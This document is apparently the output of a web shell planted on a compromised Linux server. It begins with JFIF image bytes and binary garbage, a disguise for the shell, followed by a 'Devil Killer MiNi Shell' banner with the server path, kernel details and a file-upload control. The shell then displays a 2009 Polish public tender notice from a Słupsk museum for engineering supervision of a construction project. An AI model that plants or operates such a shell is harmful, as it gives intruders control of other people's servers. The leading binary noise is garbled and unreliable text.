JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090819/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090819/285632-N-2009.html

<p class="kh_header"><b>Słupsk: Pełnienie nadzoru inżynierskiego nad zadaniem inwestycyjnym  w ramach Projektu pn. Wzmocnienie potencjału Pomorskiej Krainy w Kratę - ETAP II - Rozbudowa filii MPŚ w Swołowie objęty wsparciem w ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2007-2013. Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego oraz z budżetu samorządu województwa pomorskiego - dla potrzeb Muzeum Pomorza Środkowego w Słupsku.</b><br>
<b>Numer ogłoszenia: 285632 - 2009; data zamieszczenia: 19.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Pomorza Środkowego w Słupsku , ul. Dominikańska 5-9, 76-200 Słupsk, woj. pomorskie, tel. 059 8424081/82 w. 320, 8463020, faks 059 8426518.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorzadowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inżynierskiego nad zadaniem inwestycyjnym  w ramach Projektu pn. Wzmocnienie potencjału Pomorskiej Krainy w Kratę - ETAP II - Rozbudowa filii MPŚ w Swołowie objęty wsparciem w ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2007-2013. Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego oraz z budżetu samorządu województwa pomorskiego - dla potrzeb Muzeum Pomorza Środkowego w Słupsku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie dotyczy pełnienia nadzoru inżynierskiego nad zadaniem inwestycyjnym  w ramach Projektu pn. Wzmocnienie potencjału Pomorskiej Krainy w Kratę - ETAP II - Rozbudowa filii MPŚ w Swołowie objęty wsparciem w ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2007-2013. Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego oraz z budżetu samorządu województwa pomorskiego - dla potrzeb Muzeum Pomorza Środkowego w Słupsku. 
Zakres rzeczowy przedmiotu zamówienia:
1 Świadczenia usługi polegającej na pełnieniu nadzoru inżynierskiego obejmuje następujący zakres czynności:
1.1. Zapoznanie się z całą dokumentacją formalno-prawną jaka obowiązuje strony - odpowiednio: Zamawiający, Inżynier projektu od początku realizacji projektu do chwili jego zakończenia i całkowitego rozliczenia. Dokumentacja formalno-prawna składa się z:
1.wniosku WND-RPPM.06.03.00-019/08 (wraz z załącznikami),
2.umowy: o współfinansowanie,
3.dokumentacji technicznej,
4.przewodnika beneficjenta RPO WP 2007-2013,
5.innych dokumentów, które są obowiązujące na podstawie ww. dokumentów, lub które dopiero powstaną, a w szczególności te, których obowiązek sporządzenia wynika lub będzie wynikał z wytycznych określonych w przewodniku procedur wdrażania Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013 (RPO WP),
6.Projektem Budowlanym Wykonawczym i przedmiarami robót,
7.Szczegółową Specyfikacją Techniczną Wykonania i Odbioru Robót, opracowane przez jednostkę projektową:  Inwestprojekt - Słupsk Spółka z o.o., z siedzibą w Słupsku, ul. Kaszubska Nr 45, 76-200 Słupsk.      
2. Obowiązki i prawa nadzoru inżynierskiego- Inżyniera Projektu / Inspektora Nadzoru, 
2.1 Przekazanie wraz z Zamawiającym terenu budowy, wystawienie polecenia rozpoczęcia robót, 
2.2 reprezentowanie Zamawiającego w stosunku do Wykonawcy, administrowanie   kontraktem i nadzorowanie robót przez sprawowanie kontroli zgodności jej realizacji z projektem i pozwoleniem na budowę, przepisami oraz zasadami wiedzy technicznej, wyegzekwowania od Wykonawcy zapewnienia ochrony i ubezpieczenia budowy i mienia, 
2.3 rozwiązywanie problemów powstałych w trakcie realizacji robót,
2.4 wizytowanie budowy, monitorowanie realizacji kontraktu, egzekwowanie jakości robót i wbudowanych wyrobów budowlanych a w szczególności zapobieganie zastosowaniu materiałów wadliwych i niedopuszczonych do stosowania w budownictwie, zgodnie ze Szczegółowymi Specyfikacjami Technicznymi, sprawdzanie obmiarów, nadzorowanie i odbiór robót (zanikających i ulegających zakryciu), sprawdzanie i odbieranie oznakowania robót w czasie budowy i kontrola przestrzegania wszystkich mających zastosowanie przepisów bezpieczeństwa organizacji ruchu,
2.5 sprawdzenie szczegółowych kalkulacji, kosztorysów powykonawczych, faktur wraz z załączonymi dokumentami przedstawionych przez wykonawców, dostawców i usługobiorców oraz uzgadnianie wydatków i kosztów realizowanej inwestycji,
2.6 spowodowanie, w razie potrzeby, naniesienia zmian w dokumentacji projektowej i przekazanie Zamawiającemu dokumentacji powykonawczej,
2.7 uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych i przewodów kominowych,
2.8 opracowanie opinii dotyczących wad przedmiotu umowy, uznanych za nie nadające się do ich usunięcia oraz wnioskowanie o obniżenie wynagrodzenia wykonawcom z określeniem utraty i wartości robót i kwot obniżonego wynagrodzenia za te roboty,
2.9 zawiadamianie wykonawców o stwierdzonych wadach w ich robotach w okresie rękojmi,
2.10 sporządzanie wniosków o zapłatę kar umownych za zwłokę w realizacji inwestycji przez wykonawcę oraz za zwłokę w usunięciu usterek stwierdzonych przy odbiorze robót,
2.11 kontrola i aprobata dokumentów roszczeniowych Wykonawcy,
2.12 prowadzenie nadzoru nad realizacją zadania zgodnie z obowiązującym Prawem Budowlanym, warunkami określonymi w Specyfikacji Istotnych Warunków Zamówienia i Szczegółowymi Specyfikacjami Technicznymi dla robót i przepisami związanymi,
2.13 wstrzymaniu robót prowadzonych w sposób zagrażający bezpieczeństwu lub niezgodnie z wymaganiami kontraktu, Wydawanie kierownikowi robót/budowy poleceń potwierdzonych wpisem do dziennika budowy lub innym dokumentem dotyczących usunięcia nieprawidłowości  lub zagrożeń, wykonania prób lub badań, a także odkrywek,
2.14 ustalanie zakresu ewentualnych robót zamiennych, opracowywanie protokołów konieczności wykonywania tych robót z odpowiednim uzasadnieniem, w celu uzyskania akceptacji ze strony Zamawiającego,
2.15 uczestnictwo w konsultacji z Zamawiającym i Wykonawcą czy jest podstawa do uznania roszczenia Wykonawcy o dodatkową zapłatę,
2.16 w przypadku rozbieżności pomiędzy dokumentacją a stanem faktycznym w terenie Inżynier/Inspektor jest upoważniony do rozstrzygania takich problemów przy bezpośredniej konsultacji z Projektantem i Zamawiającym, 
2.17 kontrola kosztów inwestycji i jej rozliczenie, ustalenie podstaw i wysokości obniżenia należności Wykonawcy z tytułu obniżenia jakości robót, zatwierdzenie wartości do wypłaty dla Wykonawcy robót, 
2.18 sprawdzanie wszystkich dokumentów związanych z wystawieniem świadectwa płatności oraz zgłaszanie Zamawiającemu gotowości do zakończenia projektu,
2.19 organizowanie narad technicznych, udział w komisjach oraz uczestnictwo 
w odbiorze inwestycji,
2.20 ocena postępu robót, informowanie Zamawiającego jeżeli jest on niezgodny z harmonogramem,
2.21 obecność na budowie co najmniej raz w tygodniu (w przypadku stwierdzenia nieobecności Inspektora nadzoru Inżynierskiego na budowie przez okres co najmniej dwóch tygodni Zamawiający naliczy kary umowne w wysokości 0,1 % od całkowitego wynagrodzenia za nadzór za każdy dzień nieobecności w kolejnym tygodniu. W przypadku powtarzających się nieobecności Zamawiający ma prawo zażądać zmiany Inspektora Nadzory Inżynierskiego (naliczając kary j.w.),
2.22 przygotowania do odbioru częściowego i ostatecznego, sprawdzenie kompletności i prawidłowości przedłożonych przez Wykonawcę Robót dokumentów wymaganych do odbioru oraz uczestnictwo w odbiorze robót,
2.23 zamieszczenia we wszystkich dokumentach, przygotowywanych w związku z realizacją Projektu, informacji o udziale Unii Europejskiej i innych źródeł krajowych we współfinansowaniu Projektu oraz logo Programu, logo Unii Europejskiej i innych podmiotów krajowych współfinansujących Projekt,
2.24 poświadczenie terminu zakończenia robót,
2.25 dostarczenia Zamawiającemu min. 7 dni przed odbiorem ostatecznym kompletnego   operatu kolaudacyjnego z opinią i akceptacją,
2.26 opracowanie i dostarczenie Zamawiającemu ostatecznego rozliczenia realizowanej i odebranej inwestycji w terminie do 14 dni od terminu odbioru końcowego inwestycji,
2.27 po zakończeniu robót Inżynier/Inspektor, po uzgodnieniu z Zamawiającym, wystawi   Świadectwo Przejęcia, 
2.28 inne obowiązki wynikające ze specyfikacji technicznej wykonania i odbioru robót,    umowy na roboty,  które stanowią integralną część umowy,
2.29 współpracować ze wskazanymi przez Zamawiającego pracownikami Zamawiającego i konsultantami zewnętrznymi w sposób, który zapewni sprawne zrealizowanie projektu w założonym czasie i zgodnie z zaplanowanym budżetem,
2.30 zgłoszenie zrealizowanej inwestycji do użytkowania,
2.31 uczestniczenie w czynnościach kontrolnych sprawowanych przez organ nadzoru budowlanego i jednostek sprawujących funkcje kontrolne nad realizacją zadania inwestycyjnego, 
2.32 udział w pracach komisji związanych z przeglądami gwarancyjnymi,
2.33 udział w przeglądach pogwarancyjnych i sporządzanie protokołów pogwarancyjnych,
2.34 zawiadamianie Wykonawców o stwierdzonych wadach w ich robotach w okresie rękojmi,
2.35 spowodowanie zastępczego usunięcia w okresie rękojmi wad i usterek na koszt wykonawców..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.30.00.00-1, 71.52.00.00-9, 71.54.00.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienie mogą ubiegać sie wykonawcy potwierdzający spełnienie warunków:
1.1  Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - wymagania minimalne:
a. prowadzenie działalności gospodarczej w zakresie upoważniającym wykonawcę do ubiegania się o udzielenie zamówienia będącego przedmiotem niniejszego postępowania,
b. przedłożenie dokumentów stwierdzających, że osoby, które będą wykonywały zamówienie posiadają wymagane uprawnienia ( wg zapisów w poz.  6.1.1 SIWZ)
1.2 Posiadający niezbędną wiedzę i doświadczenie w zakresie usług objętych przedmiotem zamówienia tj. wykonał w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przynajmniej jednego zamówienia publicznego związanego z nadzorem nad obiektami zabytkowymi, porównywalnego do przedmiotu niniejszego zamówienia, finansowanego ze środków zewnętrznych o wartości co najmniej 100.000,00 PLN z podaniem daty i miejsca jego wykonania wraz z dokumentami potwierdzającymi, że zamówienie zostało wykonane należycie.  Jako jedno zamówienie publiczne należy traktować wykonany zakres rzeczowy stanowiący przedmiot jednorazowej umowy zawartej bezpośrednio pomiędzy wykonawcą a zamawiającym.
1.3 Posiadają niezbędny potencjał techniczny  do wykonania zamówienia:
a. środek transportu pozostający do dyspozycji osób, które będą realizowały niniejsze zamówienie w takim zakresie, że będą one mogły być do dyspozycji Wykonawcy robót budowlanych i Zamawiającego na zasadach określonych w SIWZ - 1 szt
1.4 Dysponują osobami zdolnymi do wykonania zamówienia:
a.w branży budowlanej w zakresie nadzoru nad obiektami zabytkowymi	-  1 osoba,
b. w branży sanitarnej	- 1 osoba,
c. w branży elektrycznej	- 1 osoba,
d. w branży c.o. 		-  1 osoba,
1.5 Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; tj. posiadają dostęp lub dysponują środkami finansowymi umożliwiającymi realizację zamówienia.
a. posiadanie ważnego i aktualnego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej,  z tytułu odpowiedzialności deliktowej oraz z tytułu odpowiedzialności kontraktowej;
1.6 Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia.
1.7 Złożą oświadczenie o spełnianiu warunków udziału w postępowaniu.
1.8. Złożą, jako kompletną, ofertę spełniającą wymogi niniejszej SIWZ i u.P.z.p.
2. Z ubiegania się o zamówienie publiczne wyklucza sie wykonawców, którzy:
2.1 nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w ppkt. 1.1 do 1.4.
2.2 podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 Prawa zamówień publicznych.
2.3 wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali sie w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji.
2.4 złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania.
2.5 nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków z zastrzeżeniem art. 26 ust. 3 Prawa zamówień publicznych.
2.6 nie zgodzili sie na przedłużenie okresu związania oferta
3. Zamawiający odrzuca ofertę jeżeli:
3.1 jest niezgodna z ustawą lub jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art.87 ust. 2 pkt. 3;
3.2 jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji
3.3 zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,
3.4 została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia lub niezaproszonego do składania ofert
3.5 zawiera błędy w obliczeniu ceny;
3.6 wykonawca w terminie 3 dni od doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3;
3.7 jest nieważna na podstawie odrębnych przepisów,
4. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
5. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metoda warunku granicznego - spełnia/niespełna..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia spełnienia warunków udziału w postępowaniu wymienionych w części V SIWZ. Wykonawca musi dołączyć do oferty następujące oświadczenia i dokumenty:
1.1. dotyczące warunku zawartego w poz. 8.1.1. w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę:
1) aktualny odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu ofert:
2) dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie posiadają wymagane uprawnienia dla osób przewidzianych do pełnienia samodzielnych funkcji technicznych, o których mowa w rozdziale II - samodzielne funkcje techniczne w budownictwie ustawy z dnia 7 lipca 1994r. (tj. Dz. U. z 2003r. nr 2007, poz. 2016 z późn. zm.): w zakresie dla branży budowlanej, sanitarnej, elektrycznej, c.o., wraz z aktualnymi na dzień składania ofert zaświadczeniami o członkostwie w Izbie Inżynierów Budownictwa.
1.2.dotyczące warunku zawartego w poz. 8.1.2. :
1) w formie oryginału wykaz wykonywanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przynajmniej jednego zamówienia publicznego związanego z nadzorem nad obiektami zabytkowymi, porównywalnego do przedmiotu niniejszego zamówienia, finansowanego ze środków zewnętrznych o wartości co najmniej 100.000,00 PLN z podaniem daty i miejsca jego wykonania, nazwy i adresu zamawiającego (inwestora)  - wg załącznika nr 2 do SIWZ (druk do wypełnienia).
2) w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę; dokumenty (referencje) potwierdzające, że usługi wyszczególnione w wykazie zostały wykonane należycie. 
1.3. dotyczące warunku zawartego w poz. 8.1.3. w formie oryginału:
wykaz potencjału technicznego niezbędnego do wykonania zamówienia jaki posiada wykonawca - wg załącznika nr 3 do SIWZ (druk do wypełnienia),
1.4. dotyczące warunku zawartego w poz. 8.1.4. SIWZ w formie oryginału:
Wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - wg załącznika nr 4 do SIWZ (druk do wypełnienia),
Uwaga:
1) informacja na temat niezbędnych posiadanych kwalifikacji przez osoby przewidywane do realizacji zamówienia muszą być zgodne z treścią dokumentów, o których mowa w poz. 6.1. pkt 2 SIWZ.
2) Zamawiający dopuszcza zatrudnienie jako podwykonawców osoby, które będą pełniły funkcje inspektorów nadzorów. Osoby te również należy wymienić w załączniku nr 4 załączając dokumenty jak w pozostałych przypadkach. Inżynier nadzoru może zawrzeć z nimi umowy wyłącznie na warunkach określonych we wzorze umowy - zał. Nr 7 SIWZ.
1.5 dotyczące warunku zawartego w poz. 8.1.5. w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę:
1) Zaświadczenie właściwego Urzędu Skarbowego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
2) Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3) Przedstawienie polisy lub innego dokumentu ubezpieczenia  potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, z tytułu odpowiedzialności deliktowej oraz z tytułu odpowiedzialności kontraktowej. Okres ubezpieczenia powinien obejmować co najmniej dzień złożenia oferty, a w przypadku wyboru oferty  ubezpieczenie powinno obejmować cały czas trwania usług ( w przypadku wspólnego ubiegania się dwóch lub więcej wykonawców o udzielenie niniejszego zamówienia, ocenie podlegać będzie dokument złożony przez tego lub tych wykonawców, którzy w imieniu wszystkich wykazywać będą jego spełnienie).
1.6. dotyczące warunku zawartego w poz. 8.1.6. i 8.1.7  w formie oryginału:
a. Oświadczenie Wykonawcy, że nie podlega wykluczeniu z postępowania stosownie do treści art. 24 ust.1 i ust. 2 u.P.z.p. załącznik nr 5 do SIWZ (druk do wypełnienia),
b. oświadczenie o spełnianiu warunków udziału w postępowaniu załącznik nr 6 do SIWZ (druk do wypełnienia),
1.7. dotyczące warunku zawartego w poz. 8.1.8. w formie oryginału:
Wypełniony formularz ofertowy w oryginale zgodnie z załącznikiem nr 1 do SIWZ (druk do wypełnienia lub wzorując się na nim).
2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dokumenty wymienione w części VI SIWZ muszą dołączyć do oferty w sposób następujący:
2.1. wymienione w poz. 6.1.1. pkt 1÷2; każdy z wykonawców występujących wspólnie przedłoży indywidualnie poszczególne dokumenty  w odniesieniu do jego firmy.
2.2. wymienione w poz. 6.1.2. pkt 1÷2; każdy z Wykonawców występujących wspólnie przedłoży indywidualnie poszczególne dokumenty w odniesieniu do jego firmy. Ilość wykazanych przez poszczególnych wykonawców wykazanych zamówień (wg pkt 1) łącznie musi potwierdzać spełnianie przedmiotowego warunku;
2.3. wymienione w poz. 6.1.3. każdy z Wykonawców występujących wspólnie przedłoży indywidualnie wykaz w odniesieniu do jego firmy;
2.4. wymienione w poz. 6.1.4.; Wykonawcy przedłożą jeden wspólny wykaz;
2.5. wymienione w poz. 6.1.5. pkt 1 i 2; wykonawcy mogą przedłożyć wymienione dokumenty wystawione alternatywnie tj. na utworzone konsorcjum albo na poszczególnych wykonawców. Dokumenty łącznie muszą spełniać warunek zawarty  w poz. 5.1.5 SIWZ.
2.6. wymienione w poz. 6.1.6 i w poz. 6.1.7.; każdy wykonawca oddzielnie złoży swoje własne oświadczenia;
2.7. wymienione w poz. 6.1.8. Wykonawcy przedłożą wspólnie.
3. Pozostałe dokumenty, które wykonawca jest zobowiązany do załączenia do oferty:
3.1. w formie oryginału: upoważnienie lub pełnomocnictwo dla osoby uprawnionej do reprezentowania firmy,  o ile nie wynika to z innych dokumentów załączonych do oferty,
4. Sposób uwierzytelnienia dokumentów:
4.1. Kserokopie (kopie) dokumentów, które uwierzytelnić może wykonawca powinny być opatrzone klauzulą za zgodność z oryginałem oraz podpisem wykonawcy na każdej stronie potwierdzanego dokumentu. 
4.2. Dokumenty sporządzane przez wykonawcę w formie oryginału jeżeli zawierają więcej niż jedną stronę powinny być opatrzone podpisem i pieczęcią upoważnionej osoby podpisującej dokument na każdej ze stron.
4.3.Zamawiający może zażądać przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kserokopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości. Dokumenty złożone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.
5. Zamawiający informuje, że zgodnie z art. 8 Pzp oferty składane w postępowaniu o zamówienie publiczne są jawne i podlegają udostępnieniu od chwili ich otwarcia, z wyjątkiem informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2003r. nr 153, poz. 1503 z późn. zm.), jeżeli Wykonawca, nie później niż w terminie składania ofert, zastrzegł, że nie mogą być one udostępniane.
6. Stosowne zastrzeżenie Wykonawca winien złożyć w formularzu ofertowym. W przeciwnym razie cała oferta zostanie ujawniona na życzenie każdego uczestnika postępowania.
7. Zastrzeżenie informacji, które nie stanowią tajemnicy przedsiębiorstwa w rozumieniu ww. ustawy skutkować będzie uznaniem zastrzeżenia za bezskuteczne..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
